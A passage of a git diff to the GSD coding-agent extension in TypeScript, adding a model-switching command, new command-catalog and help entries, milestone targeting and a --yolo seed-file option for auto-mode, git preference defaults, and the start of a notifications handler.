@@ -298,25 +346,25 @@ async function configureModels(ctx: ExtensionCommandContext, prefs: Record<strin
       }
 
       // Step 2: pick model within provider
-      const providerName = providerChoice.replace(/ \(\d+ models?\)$/, "");
+      const providerName = displayToReal.get(providerChoice) ?? providerChoice.replace(/ \(\d+ models?\)$/, "");
       const group = byProvider.get(providerName);
       if (!group) continue;
 
       const modelOptions = group.map(m => m.id);
       modelOptions.push("(keep current)", "(clear)");
 
-      const modelChoice = await ctx.ui.select(`${phaseLabel} — ${providerName}:`, modelOptions);
+      const modelChoice = await ctx.ui.select(`${phaseLabel} — ${displayName(providerName)}:`, modelOptions);
       if (modelChoice && typeof modelChoice === "string" && modelChoice !== "(keep current)") {
         if (modelChoice === "(clear)") {
           delete models[phase];
         } else {
-          models[phase] = modelChoice;
+          models[phase] = toPersistedModelId(providerName, modelChoice);
         }
       }
     }
   } else {
     for (const phase of modelPhases) {
-      const current = models[phase] ?? "";
+      const current = formatConfiguredModel(models[phase]);
       const input = await ctx.ui.input(
         `Model for ${phase} phase${current ? ` (current: ${current})` : ""}:`,
         current || "e.g. claude-sonnet-4-20250514",
@@ -333,6 +381,8 @@ async function configureModels(ctx: ExtensionCommandContext, prefs: Record<strin
   }
   if (Object.keys(models).length > 0) {
     prefs.models = models;
+  } else {
+    delete prefs.models;
   }
 }
 
@@ -390,7 +440,7 @@ async function configureGit(ctx: ExtensionCommandContext, prefs: Record<string,
   const gitBooleanFields = [
     { key: "auto_push", label: "Auto-push commits after committing", defaultVal: false },
     { key: "push_branches", label: "Push milestone branches to remote", defaultVal: false },
-    { key: "snapshots", label: "Create WIP snapshot commits during long tasks", defaultVal: false },
+    { key: "snapshots", label: "Create WIP snapshot commits during long tasks", defaultVal: true },
   ] as const;
 
   for (const field of gitBooleanFields) {
@@ -423,7 +473,7 @@ async function configureGit(ctx: ExtensionCommandContext, prefs: Record<string,
   // pre_merge_check
   const currentPreMerge = git.pre_merge_check !== undefined ? String(git.pre_merge_check) : "";
   const preMergeChoice = await ctx.ui.select(
-    `Pre-merge check${currentPreMerge ? ` (current: ${currentPreMerge})` : " (default: false)"}:`,
+    `Pre-merge check${currentPreMerge ? ` (current: ${currentPreMerge})` : " (default: auto)"}:`,
     ["true", "false", "auto", "(keep current)"],
   );
   if (preMergeChoice && preMergeChoice !== "(keep current)") {
@@ -469,9 +519,39 @@ async function configureGit(ctx: ExtensionCommandContext, prefs: Record<string,
     git.isolation = isolationChoice;
   }
 
+  // absorb_snapshot_commits (git sub-key)
+  const currentAbsorb = git.absorb_snapshot_commits;
+  const absorbStr = currentAbsorb !== undefined ? String(currentAbsorb) : "";
+  const absorbChoice = await ctx.ui.select(
+    `Absorb snapshot commits into real commits${absorbStr ? ` (current: ${absorbStr})` : " (default: true)"}:`,
+    ["true", "false", "(keep current)"],
+  );
+  if (absorbChoice && absorbChoice !== "(keep current)") {
+    git.absorb_snapshot_commits = absorbChoice === "true";
+  }
+
   if (Object.keys(git).length > 0) {
     prefs.git = git;
   }
+
+  // stale_commit_threshold_minutes (top-level pref, shown in Git section)
+  const currentThreshold = prefs.stale_commit_threshold_minutes;
+  const thresholdStr = currentThreshold !== undefined ? String(currentThreshold) : "";
+  const thresholdInput = await ctx.ui.input(
+    `Stale commit threshold (minutes, 0 to disable)${thresholdStr ? ` (current: ${thresholdStr})` : " (default: 30)"}:`,
+    thresholdStr || "30",
+  );
+  if (thresholdInput !== null && thresholdInput !== undefined) {
+    const val = thresholdInput.trim();
+    const parsed = tryParseInteger(val);
+    if (val && parsed !== null && parsed >= 0) {
+      prefs.stale_commit_threshold_minutes = parsed;
+    } else if (val && parsed === null) {
+      ctx.ui.notify(`Invalid value "${val}" — must be a whole number. Keeping previous value.`, "warning");
+    } else if (!val && currentThreshold !== undefined) {
+      delete prefs.stale_commit_threshold_minutes;
+    }
+  }
 }
 
 async function configureSkills(ctx: ExtensionCommandContext, prefs: Record<string, unknown>): Promise<void> {
@@ -588,7 +668,7 @@ export async function configureMode(ctx: ExtensionCommandContext, prefs: Record<
     if (modeStr.startsWith("solo")) {
       prefs.mode = "solo";
       ctx.ui.notify(
-        "Mode: solo — defaults: auto_push=true, push_branches=false, pre_merge_check=false, merge_strategy=squash, isolation=worktree, unique_milestone_ids=false",
+        "Mode: solo — defaults: auto_push=true, push_branches=false, pre_merge_check=auto, merge_strategy=squash, isolation=worktree, unique_milestone_ids=false",
         "info",
       );
     } else if (modeStr.startsWith("team")) {
@@ -771,7 +851,7 @@ export async function ensurePreferencesFile(
   scope: "global" | "project",
 ): Promise<void> {
   if (!existsSync(path)) {
-    const template = await loadFile(join(dirname(fileURLToPath(import.meta.url)), "templates", "preferences.md"));
+    const template = await loadFile(join(dirname(fileURLToPath(import.meta.url)), "templates", "PREFERENCES.md"));
     if (!template) {
       ctx.ui.notify("Could not load GSD preferences template.", "error");
       return;
diff --git a/src/resources/extensions/gsd/commands/catalog.ts b/src/resources/extensions/gsd/commands/catalog.ts
index 6f2613382..1aa1040f1 100644
--- a/src/resources/extensions/gsd/commands/catalog.ts
+++ b/src/resources/extensions/gsd/commands/catalog.ts
@@ -15,7 +15,7 @@ export interface GsdCommandDefinition {
 type CompletionMap = Record<string, readonly GsdCommandDefinition[]>;
 
 export const GSD_COMMAND_DESCRIPTION =
-  "GSD — Get Shit Done: /gsd help|start|templates|next|auto|stop|pause|status|widget|visualize|queue|quick|discuss|capture|triage|dispatch|history|undo|rate|skip|export|cleanup|mode|prefs|config|keys|hooks|run-hook|skill-health|doctor|logs|forensics|changelog|migrate|remote|steer|knowledge|new-milestone|parallel|cmux|park|unpark|init|setup|inspect|extensions|update|fast";
+  "GSD — Get Shit Done: /gsd help|start|templates|next|auto|stop|pause|status|widget|visualize|queue|quick|discuss|capture|triage|dispatch|history|undo|undo-task|reset-slice|rate|skip|export|cleanup|model|mode|prefs|config|keys|hooks|run-hook|skill-health|doctor|logs|forensics|changelog|migrate|remote|steer|knowledge|new-milestone|parallel|cmux|park|unpark|init|setup|inspect|extensions|update|fast|mcp|rethink|codebase|notifications";
 
 export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [
   { cmd: "help", desc: "Categorized command reference with descriptions" },
@@ -35,10 +35,13 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [
   { cmd: "dispatch", desc: "Dispatch a specific phase directly" },
   { cmd: "history", desc: "View execution history" },
   { cmd: "undo", desc: "Revert last completed unit" },
+  { cmd: "undo-task", desc: "Reset a specific task's completion state (DB + markdown)" },
+  { cmd: "reset-slice", desc: "Reset a slice and all its tasks (DB + markdown)" },
   { cmd: "rate", desc: "Rate last unit's model tier (over/ok/under) — improves adaptive routing" },
   { cmd: "skip", desc: "Prevent a unit from auto-mode dispatch" },
   { cmd: "export", desc: "Export milestone/slice results" },
   { cmd: "cleanup", desc: "Remove merged branches or snapshots" },
+  { cmd: "model", desc: "Switch the active session model or open a picker" },
   { cmd: "mode", desc: "Switch workflow mode (solo/team)" },
   { cmd: "prefs", desc: "Manage preferences (model selection, timeouts, etc.)" },
   { cmd: "config", desc: "Set API keys for external tools" },
@@ -46,6 +49,7 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [
   { cmd: "hooks", desc: "Show configured post-unit and pre-dispatch hooks" },
   { cmd: "run-hook", desc: "Manually trigger a specific hook" },
   { cmd: "skill-health", desc: "Skill lifecycle dashboard" },
+  { cmd: "notifications", desc: "View, filter, and clear persistent notification history" },
   { cmd: "doctor", desc: "Runtime health checks with auto-fix" },
   { cmd: "logs", desc: "Browse activity logs, debug logs, and metrics" },
   { cmd: "forensics", desc: "Examine execution logs" },
@@ -57,7 +61,7 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [
   { cmd: "inspect", desc: "Show SQLite DB diagnostics" },
   { cmd: "knowledge", desc: "Add persistent project knowledge (rule, pattern, or lesson)" },
   { cmd: "new-milestone", desc: "Create a milestone from a specification document (headless)" },
-  { cmd: "parallel", desc: "Parallel milestone orchestration (start, status, stop, merge)" },
+  { cmd: "parallel", desc: "Parallel milestone orchestration (start, status, stop, merge, watch)" },
   { cmd: "cmux", desc: "Manage cmux integration (status, sidebar, notifications, splits)" },
   { cmd: "park", desc: "Park a milestone — skip without deleting" },
   { cmd: "unpark", desc: "Reactivate a parked milestone" },
@@ -66,7 +70,10 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [
   { cmd: "templates", desc: "List available workflow templates" },
   { cmd: "extensions", desc: "Manage extensions (list, enable, disable, info)" },
   { cmd: "fast", desc: "Toggle OpenAI service tier (on/off/flex/status)" },
+  { cmd: "mcp", desc: "MCP server status and connectivity check (status, check <server>)" },
+  { cmd: "rethink", desc: "Conversational project reorganization — reorder, park, discard, add milestones" },
   { cmd: "workflow", desc: "Custom workflow lifecycle (new, run, list, validate, pause, resume)" },
+  { cmd: "codebase", desc: "Generate, refresh, and inspect the codebase map cache (.gsd/CODEBASE.md)" },
 ];
 
 const NESTED_COMPLETIONS: CompletionMap = {
@@ -96,6 +103,7 @@ const NESTED_COMPLETIONS: CompletionMap = {
     { cmd: "pause", desc: "Pause a specific worker" },
     { cmd: "resume", desc: "Resume a paused worker" },
     { cmd: "merge", desc: "Merge completed milestone branches" },
+    { cmd: "watch", desc: "Live TUI dashboard monitoring all workers" },
   ],
   setup: [
     { cmd: "llm", desc: "Configure LLM provider settings" },
@@ -104,6 +112,11 @@ const NESTED_COMPLETIONS: CompletionMap = {
     { cmd: "keys", desc: "Manage API keys" },
     { cmd: "prefs", desc: "Configure global preferences" },
   ],
+  notifications: [
+    { cmd: "clear", desc: "Clear all notifications" },
+    { cmd: "tail", desc: "Show last N notifications (default: 20)" },
+    { cmd: "filter", desc: "Filter by severity (error|warning|info|success)" },
+  ],
   logs: [
     { cmd: "debug", desc: "List or view debug log files" },
     { cmd: "tail", desc: "Show last N activity log summaries" },
@@ -185,6 +198,10 @@ const NESTED_COMPLETIONS: CompletionMap = {
     { cmd: "flex", desc: "Flex tier (0.5x cost, slower)" },
     { cmd: "status", desc: "Show current service tier setting" },
   ],
+  mcp: [
+    { cmd: "status", desc: "Show all MCP server statuses (default)" },
+    { cmd: "check", desc: "Detailed status for a specific server" },
+  ],
   doctor: [
     { cmd: "fix", desc: "Auto-fix detected issues" },
     { cmd: "heal", desc: "AI-driven deep healing" },
@@ -216,6 +233,16 @@ const NESTED_COMPLETIONS: CompletionMap = {
     { cmd: "pause", desc: "Pause custom workflow auto-mode" },
     { cmd: "resume", desc: "Resume paused custom workflow auto-mode" },
   ],
+  codebase: [
+    { cmd: "generate", desc: "Generate or regenerate CODEBASE.md" },
+    { cmd: "generate --max-files", desc: "Generate with custom file limit (default: 500)" },
+    { cmd: "generate --collapse-threshold", desc: "Generate with custom collapse threshold (default: 20)" },
+    { cmd: "update", desc: "Refresh the CODEBASE.md cache immediately (preserves descriptions)" },
+    { cmd: "update --max-files", desc: "Update with custom file limit" },
+    { cmd: "update --collapse-threshold", desc: "Update with custom collapse threshold" },
+    { cmd: "stats", desc: "Show file count, description coverage, and generation time" },
+    { cmd: "help", desc: "Show usage and available subcommands" },
+  ],
 };
 
 function filterOptions(
diff --git a/src/resources/extensions/gsd/commands/context.ts b/src/resources/extensions/gsd/commands/context.ts
index 07f237592..f4a5aa423 100644
--- a/src/resources/extensions/gsd/commands/context.ts
+++ b/src/resources/extensions/gsd/commands/context.ts
@@ -13,7 +13,13 @@ export interface GsdDispatchContext {
 }
 
 export function projectRoot(): string {
-  const cwd = process.cwd();
+  let cwd: string;
+  try {
+    cwd = process.cwd();
+  } catch {
+    // cwd directory was deleted (e.g. worktree teardown) — fall back to HOME (#3598)
+    cwd = process.env.HOME ?? "/";
+  }
   const root = resolveProjectRoot(cwd);
   if (root !== cwd) {
     assertSafeDirectory(cwd);
@@ -47,15 +53,10 @@ export async function guardRemoteSession(
     return false;
   }
 
-  const unitsMsg = remote.completedUnits != null
-    ? `${remote.completedUnits} units completed`
-    : "";
-
   const choice = await showNextAction(ctx, {
     title: `Auto-mode is running in another terminal (PID ${remote.pid})`,
     summary: [
       `Currently executing: ${unitLabel}`,
-      ...(unitsMsg ? [unitsMsg] : []),
       ...(remote.startedAt ? [`Started: ${remote.startedAt}`] : []),
     ],
     actions: [
diff --git a/src/resources/extensions/gsd/commands/dispatcher.ts b/src/resources/extensions/gsd/commands/dispatcher.ts
index 9f28cbbaa..a3d11344b 100644
--- a/src/resources/extensions/gsd/commands/dispatcher.ts
+++ b/src/resources/extensions/gsd/commands/dispatcher.ts
@@ -14,7 +14,7 @@ export async function handleGSDCommand(
   const trimmed = (typeof args === "string" ? args : "").trim();
 
   const handlers = [
-    () => handleCoreCommand(trimmed, ctx),
+    () => handleCoreCommand(trimmed, ctx, pi),
     () => handleAutoCommand(trimmed, ctx, pi),
     () => handleParallelCommand(trimmed, ctx, pi),
     () => handleWorkflowCommand(trimmed, ctx, pi),
@@ -29,4 +29,3 @@ export async function handleGSDCommand(
 
   ctx.ui.notify(`Unknown: /gsd ${trimmed}. Run /gsd help for available commands.`, "warning");
 }
-
diff --git a/src/resources/extensions/gsd/commands/handlers/auto.ts b/src/resources/extensions/gsd/commands/handlers/auto.ts
index b261d8a34..923191cfb 100644
--- a/src/resources/extensions/gsd/commands/handlers/auto.ts
+++ b/src/resources/extensions/gsd/commands/handlers/auto.ts
@@ -1,9 +1,66 @@
 import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent";
 
+import { existsSync, readFileSync } from "node:fs";
+import { resolve } from "node:path";
+
 import { enableDebug } from "../../debug-logger.js";
 import { getAutoDashboardData, isAutoActive, isAutoPaused, pauseAuto, startAuto, stopAuto, stopAutoRemote } from "../../auto.js";
 import { handleRate } from "../../commands-rate.js";
 import { guardRemoteSession, projectRoot } from "../context.js";
+import { findMilestoneIds } from "../../milestone-id-utils.js";
+
+/**
+ * Parse --yolo flag and optional file path from the auto command string.
+ * Supports: `/gsd auto --yolo path/to/file.md` or `/gsd auto -y path/to/file.md`
+ */
+function parseYoloFlag(trimmed: string): { yoloSeedFile: string | null; rest: string } {
+  const yoloRe = /(?:--yolo|-y)\s+("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|\S+)/;
+  const match = trimmed.match(yoloRe);
+  if (!match) return { yoloSeedFile: null, rest: trimmed };
+
+  // Strip quotes if present
+  let filePath = match[1];
+  if ((filePath.startsWith('"') && filePath.endsWith('"')) ||
+      (filePath.startsWith("'") && filePath.endsWith("'"))) {
+    filePath = filePath.slice(1, -1);
+  }
+
+  const rest = trimmed.replace(match[0], "").replace(/\s+/g, " ").trim();
+  return { yoloSeedFile: filePath, rest };
+}
+
+/**
+ * Extract a milestone ID (e.g. M016 or M001-a3b4c5) from the command string.
+ * Returns the matched ID and the remaining string with the ID removed.
+ * The milestone ID pattern matches the format used by findMilestoneIds: M\d+ with
+ * an optional -[a-z0-9]{6} suffix for unique milestone IDs.
+ */
+export function parseMilestoneTarget(input: string): { milestoneId: string | null; rest: string } {
+  const match = input.match(/\b(M\d+(?:-[a-z0-9]{6})?)\b/);
+  if (!match) return { milestoneId: null, rest: input };
+  const rest = input.replace(match[0], "").replace(/\s+/g, " ").trim();
+  return { milestoneId: match[1], rest };
+}
+
+/**
+ * Set GSD_MILESTONE_LOCK to target a specific milestone, then run `fn`.
+ * Clears the env var when `fn` resolves or rejects, so the lock does not
+ * leak into subsequent commands in the same process.
+ */
+async function withMilestoneLock(milestoneId: string, fn: () => Promise<void>): Promise<void> {
+  const previous = process.env.GSD_MILESTONE_LOCK;
+  process.env.GSD_MILESTONE_LOCK = milestoneId;
+  try {
+    await fn();
+  } finally {
+    // Restore previous value (undefined → delete, else restore).
+    if (previous === undefined) {
+      delete process.env.GSD_MILESTONE_LOCK;
+    } else {
+      process.env.GSD_MILESTONE_LOCK = previous;
+    }
+  }
+}
 
 export async function handleAutoCommand(trimmed: string, ctx: ExtensionCommandContext, pi: ExtensionAPI): Promise<boolean> {
   if (trimmed === "next" || trimmed.startsWith("next ")) {
@@ -12,20 +69,73 @@ export async function handleAutoCommand(trimmed: string, ctx: ExtensionCommandCo
       await handleDryRun(ctx, projectRoot());
       return true;
     }
-    const verboseMode = trimmed.includes("--verbose");
-    const debugMode = trimmed.includes("--debug");
+    const { milestoneId, rest: afterMilestone } = parseMilestoneTarget(trimmed);
+    const verboseMode = afterMilestone.includes("--verbose");
+    const debugMode = afterMilestone.includes("--debug");
     if (debugMode) enableDebug(projectRoot());
     if (!(await guardRemoteSession(ctx, pi))) return true;
-    await startAuto(ctx, pi, projectRoot(), verboseMode, { step: true });
+
+    // Validate the milestone target exists and is not already complete.
+    if (milestoneId) {
+      const allIds = findMilestoneIds(projectRoot());
+      if (!allIds.includes(milestoneId)) {
+        ctx.ui.notify(`Milestone ${milestoneId} does not exist. Available: ${allIds.join(", ") || "(none)"}`, "error");
+        return true;
+      }
+    }
+
+    if (milestoneId) {
+      await withMilestoneLock(milestoneId, () =>
+        startAuto(ctx, pi, projectRoot(), verboseMode, { step: true }),
+      );
+    } else {
+      await startAuto(ctx, pi, projectRoot(), verboseMode, { step: true });
+    }
     return true;
   }
 
   if (trimmed === "auto" || trimmed.startsWith("auto ")) {
-    const verboseMode = trimmed.includes("--verbose");
-    const debugMode = trimmed.includes("--debug");
+    const { yoloSeedFile, rest: afterYolo } = parseYoloFlag(trimmed);
+    const { milestoneId, rest: afterMilestone } = parseMilestoneTarget(afterYolo);
+    const verboseMode = afterMilestone.includes("--verbose");
+    const debugMode = afterMilestone.includes("--debug");
     if (debugMode) enableDebug(projectRoot());
     if (!(await guardRemoteSession(ctx, pi))) return true;
-    await startAuto(ctx, pi, projectRoot(), verboseMode);
+
+    // Validate the milestone target exists and is not already complete.
+    if (milestoneId) {
+      const allIds = findMilestoneIds(projectRoot());
+      if (!allIds.includes(milestoneId)) {
+        ctx.ui.notify(`Milestone ${milestoneId} does not exist. Available: ${allIds.join(", ") || "(none)"}`, "error");
+        return true;
+      }
+    }
+
+    if (yoloSeedFile) {
+      const resolved = resolve(projectRoot(), yoloSeedFile);
+      if (!existsSync(resolved)) {
+        ctx.ui.notify(`Yolo seed file not found: ${resolved}`, "error");
+        return true;
+      }
+      const seedContent = readFileSync(resolved, "utf-8").trim();
+      if (!seedContent) {
+        ctx.ui.notify(`Yolo seed file is empty: ${resolved}`, "error");
+        return true;
+      }
+      // Headless path: bootstrap project, dispatch non-interactive discuss,
+      // then auto-mode starts automatically via checkAutoStartAfterDiscuss
+      // when the LLM says "Milestone X ready."
+      const { showHeadlessMilestoneCreation } = await import("../../guided-flow.js");
+      await showHeadlessMilestoneCreation(ctx, pi, projectRoot(), seedContent);
+    } else if (milestoneId) {
+      // Target a specific milestone — use GSD_MILESTONE_LOCK so state
+      // derivation only sees this milestone (#2521).
+      await withMilestoneLock(milestoneId, () =>
+        startAuto(ctx, pi, projectRoot(), verboseMode),
+      );
+    } else {
+      await startAuto(ctx, pi, projectRoot(), verboseMode);
+    }
     return true;
   }
 
diff --git a/src/resources/extensions/gsd/commands/handlers/core.ts b/src/resources/extensions/gsd/commands/handlers/core.ts
index 3028f72c5..ae8da6c60 100644
--- a/src/resources/extensions/gsd/commands/handlers/core.ts
+++ b/src/resources/extensions/gsd/commands/handlers/core.ts
@@ -1,4 +1,5 @@
-import type { ExtensionCommandContext, ExtensionContext } from "@gsd/pi-coding-agent";
+import type { ExtensionAPI, ExtensionCommandContext, ExtensionContext } from "@gsd/pi-coding-agent";
+import type { Model } from "@gsd/pi-ai";
 import type { GSDState } from "../../types.js";
 
 import { computeProgressScore, formatProgressLine } from "../../progress-score.js";
@@ -8,6 +9,7 @@ import { runEnvironmentChecks } from "../../doctor-environment.js";
 import { deriveState } from "../../state.js";
 import { handleCmux } from "../../commands-cmux.js";
 import { projectRoot } from "../context.js";
+import { formatShortcut } from "../../files.js";
 
 export function showHelp(ctx: ExtensionCommandContext): void {
   const lines = [
@@ -24,11 +26,12 @@ export function showHelp(ctx: ExtensionCommandContext): void {
     "  /gsd new-milestone  Create milestone from headless context (used by gsd headless)",
     "",
     "VISIBILITY",
-    "  /gsd status         Show progress dashboard  (Ctrl+Alt+G)",
+    `  /gsd status         Show progress dashboard  (${formatShortcut("Ctrl+Alt+G")})`,
     "  /gsd visualize      Interactive 10-tab TUI (progress, timeline, deps, metrics, health, agent, changes, knowledge, captures, export)",
     "  /gsd queue          Show queued/dispatched units and execution order",
     "  /gsd history        View execution history  [--cost] [--phase] [--model] [N]",
     "  /gsd changelog      Show categorized release notes  [version]",
+    `  /gsd notifications  View persistent notification history  [clear|tail|filter]  (${formatShortcut("Ctrl+Alt+N")})`,
     "",
     "COURSE CORRECTION",
     "  /gsd steer <desc>   Apply user override to active work",
@@ -36,23 +39,28 @@ export function showHelp(ctx: ExtensionCommandContext): void {
     "  /gsd triage         Classify and route pending captures",
     "  /gsd skip <unit>    Prevent a unit from auto-mode dispatch",
     "  /gsd undo           Revert last completed unit  [--force]",
+    "  /gsd rethink        Conversational project reorganization — reorder, park, discard, add milestones",
     "  /gsd park [id]      Park a milestone — skip without deleting  [reason]",
     "  /gsd unpark [id]    Reactivate a parked milestone",
     "",
     "PROJECT KNOWLEDGE",
     "  /gsd knowledge <type> <text>   Add rule, pattern, or lesson to KNOWLEDGE.md",
+    "  /gsd codebase [generate|update|stats]   Manage the CODEBASE.md cache used in prompt context",
     "",
     "SETUP & CONFIGURATION",
     "  /gsd init           Project init wizard — detect, configure, bootstrap .gsd/",
     "  /gsd setup          Global setup status  [llm|search|remote|keys|prefs]",
+    "  /gsd model          Switch active session model  [provider/model|model-id]",
     "  /gsd mode           Set workflow mode (solo/team)  [global|project]",
     "  /gsd prefs          Manage preferences  [global|project|status|wizard|setup|import-claude]",
     "  /gsd cmux           Manage cmux integration  [status|on|off|notifications|sidebar|splits|browser]",
     "  /gsd config         Set API keys for external tools",
     "  /gsd keys           API key manager  [list|add|remove|test|rotate|doctor]",
+    "  /gsd show-config    Show effective configuration (models, routing, toggles)",
     "  /gsd hooks          Show post-unit hook configuration",
     "  /gsd extensions     Manage extensions  [list|enable|disable|info]",
     "  /gsd fast           Toggle OpenAI service tier  [on|off|flex|status]",
+    "  /gsd mcp            MCP server status and connectivity  [status|check <server>]",
     "",
     "MAINTENANCE",
     "  /gsd doctor         Diagnose and repair .gsd/ state  [audit|fix|heal] [scope]",
@@ -68,6 +76,9 @@ export function showHelp(ctx: ExtensionCommandContext): void {
 
 export async function handleStatus(ctx: ExtensionCommandContext): Promise<void> {
   const basePath = projectRoot();
+  // Open DB in cold sessions so status uses DB-backed state, not filesystem fallback (#3385)
+  const { ensureDbOpen } = await import("../../bootstrap/dynamic-tools.js");
+  await ensureDbOpen();
   const state = await deriveState(basePath);
 
   if (state.registry.length === 0) {
@@ -76,8 +87,8 @@ export async function handleStatus(ctx: ExtensionCommandContext): Promise<void>
   }
 
   const { GSDDashboardOverlay } = await import("../../dashboard-overlay.js");
-  const result = await ctx.ui.custom<void>(
-    (tui, theme, _kb, done) => new GSDDashboardOverlay(tui, theme, () => done()),
+  const result = await ctx.ui.custom<boolean>(
+    (tui, theme, _kb, done) => new GSDDashboardOverlay(tui, theme, () => done(true)),
     {
       overlay: true,
       overlayOptions: {
@@ -105,8 +116,8 @@ export async function handleVisualize(ctx: ExtensionCommandContext): Promise<voi
   }
 
   const { GSDVisualizerOverlay } = await import("../../visualizer-overlay.js");
-  const result = await ctx.ui.custom<void>(
-    (tui, theme, _kb, done) => new GSDVisualizerOverlay(tui, theme, () => done()),
+  const result = await ctx.ui.custom<boolean>(
+    (tui, theme, _kb, done) => new GSDVisualizerOverlay(tui, theme, () => done(true)),
     {
       overlay: true,
       overlayOptions: {
@@ -171,7 +182,106 @@ export async function handleSetup(args: string, ctx: ExtensionCommandContext): P
   );
 }
 
-export async function handleCoreCommand(trimmed: string, ctx: ExtensionCommandContext): Promise<boolean> {
+function sortModelsForSelection(models: Model<any>[], currentModel: Model<any> | undefined): Model<any>[] {
+  return [...models].sort((a, b) => {
+    const aCurrent = currentModel && a.provider === currentModel.provider && a.id === currentModel.id;
+    const bCurrent = currentModel && b.provider === currentModel.provider && b.id === currentModel.id;
+    if (aCurrent && !bCurrent) return -1;
+    if (!aCurrent && bCurrent) return 1;
+    const providerCmp = a.provider.localeCompare(b.provider);
+    if (providerCmp !== 0) return providerCmp;
+    return a.id.localeCompare(b.id);
+  });
+}
+
+async function resolveRequestedModel(
+  query: string,
+  ctx: ExtensionCommandContext,
+): Promise<Model<any> | undefined> {
+  const { resolveModelId } = await import("../../auto-model-selection.js");
+  const models = ctx.modelRegistry.getAvailable();
+  const exact = resolveModelId(query, models, ctx.model?.provider);
+  if (exact) return exact;
+
+  const lowerQuery = query.toLowerCase();
+  const partialMatches = models.filter((model) =>
+    model.id.toLowerCase().includes(lowerQuery)
+      || `${model.provider}/${model.id}`.toLowerCase().includes(lowerQuery),
+  );
+
+  if (partialMatches.length === 1) return partialMatches[0];
+  if (partialMatches.length === 0 || !ctx.hasUI) return undefined;
+
+  const sorted = sortModelsForSelection(partialMatches, ctx.model);
+  const optionToModel = new Map<string, Model<any>>();
+  const options = sorted.map((model) => {
+    const label = `${model.provider}/${model.id}`;
+    optionToModel.set(label, model);
+    return label;
+  });
+  options.push("(cancel)");
+
+  const choice = await ctx.ui.select(`Multiple models match "${query}" — choose one:`, options);
+  if (!choice || typeof choice !== "string" || choice === "(cancel)") return undefined;
+  return optionToModel.get(choice);
+}
+
+async function handleModel(trimmedArgs: string, ctx: ExtensionCommandContext, pi: ExtensionAPI | undefined): Promise<void> {
+  const availableModels = ctx.modelRegistry.getAvailable();
+  if (availableModels.length === 0) {
+    ctx.ui.notify("No available models found. Check provider auth and model discovery.", "warning");
+    return;
+  }
+  if (!pi) {
+    ctx.ui.notify("Model switching is unavailable in this context.", "warning");
+    return;
+  }
+
+  const trimmed = trimmedArgs.trim();
+  let targetModel: Model<any> | undefined;
+
+  if (!trimmed) {
+    if (!ctx.hasUI) {
+      const current = ctx.model ? `${ctx.model.provider}/${ctx.model.id}` : "(none)";
+      ctx.ui.notify(`Current model: ${current}\nUsage: /gsd model <provider/model|model-id>`, "info");
+      return;
+    }
+
+    const optionToModel = new Map<string, Model<any>>();
+    const options = sortModelsForSelection(availableModels, ctx.model).map((model) => {
+      const isCurrent = ctx.model && model.provider === ctx.model.provider && model.id === ctx.model.id;
+      const label = `${isCurrent ? "* " : ""}${model.provider}/${model.id}`;
+      optionToModel.set(label, model);
+      return label;
+    });
+    options.push("(cancel)");
+
+    const choice = await ctx.ui.select("Select session model:", options);
+    if (!choice || typeof choice !== "string" || choice === "(cancel)") return;
+    targetModel = optionToModel.get(choice);
+  } else {
+    targetModel = await resolveRequestedModel(trimmed, ctx);
+  }
+
+  if (!targetModel) {
+    ctx.ui.notify(`Model "${trimmed}" not found. Use /gsd model with an exact provider/model or a unique model ID.`, "warning");
+    return;
+  }
+
+  const ok = await pi.setModel(targetModel);
+  if (!ok) {
+    ctx.ui.notify(`No API key for ${targetModel.provider}/${targetModel.id}`, "warning");
+    return;
+  }
+
+  ctx.ui.notify(`Model: ${targetModel.provider}/${targetModel.id}`, "info");
+}
+
+export async function handleCoreCommand(
+  trimmed: string,
+  ctx: ExtensionCommandContext,
+  pi?: ExtensionAPI,
+): Promise<boolean> {
   if (trimmed === "help" || trimmed === "h" || trimmed === "?") {
     showHelp(ctx);
     return true;
@@ -195,6 +305,10 @@ export async function handleCoreCommand(trimmed: string, ctx: ExtensionCommandCo
     ctx.ui.notify(`Widget: ${getWidgetMode()}`, "info");
     return true;
   }
+  if (trimmed === "model" || trimmed.startsWith("model ")) {
+    await handleModel(trimmed.replace(/^model\s*/, "").trim(), ctx, pi);
+    return true;
+  }
   if (trimmed === "mode" || trimmed.startsWith("mode ")) {
     const modeArgs = trimmed.replace(/^mode\s*/, "").trim();
     const scope = modeArgs === "project" ? "project" : "global";
@@ -211,6 +325,25 @@ export async function handleCoreCommand(trimmed: string, ctx: ExtensionCommandCo
     await handleCmux(trimmed.replace(/^cmux\s*/, "").trim(), ctx);
     return true;
   }
+  if (trimmed === "show-config") {
+    const { GSDConfigOverlay, formatConfigText } = await import("../../config-overlay.js");
+    const result = await ctx.ui.custom<boolean>(
+      (tui, theme, _kb, done) => new GSDConfigOverlay(tui, theme, () => done(true)),
+      {
+        overlay: true,
+        overlayOptions: {
+          width: "65%",
+          minWidth: 55,
+          maxHeight: "85%",
+          anchor: "center",
+        },
+      },
+    );
+    if (result === undefined) {
+      ctx.ui.notify(formatConfigText(), "info");
+    }
+    return true;
+  }
   if (trimmed === "setup" || trimmed.startsWith("setup ")) {
     await handleSetup(trimmed.replace(/^setup\s*/, "").trim(), ctx);
     return true;
diff --git a/src/resources/extensions/gsd/commands/handlers/notifications-handler.ts b/src/resources/extensions/gsd/commands/handlers/notifications-handler.ts
new file mode 100644
index 000000000..16d30d49a
--- /dev/null
+++ b/src/resources/extensions/gsd/commands/handlers/notifications-handler.ts
@@ -0,0 +1,140 @@
+// GSD Extension — /gsd notifications Command Handler
+// View, filter, and clear the persistent notification history.
+
+import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent";
+
+import {
+  readNotifications,
+  clearNotifications,
+  getUnreadCount,
+  suppressPersistence,
+  unsuppressPersistence,
+  type NotifySeverity,
+} from "../../notification-store.js";
+import { GSDNotificationOverlay } from "../../notification-overlay.js";
+
+function severityIcon(severity: NotifySeverity): string {
+  switch (severity) {
+    case "error": return "✗";
+    case "warning": return "⚠";
+    case "success": return "✓";
+    case "info":
+    default: return "●";
+  }
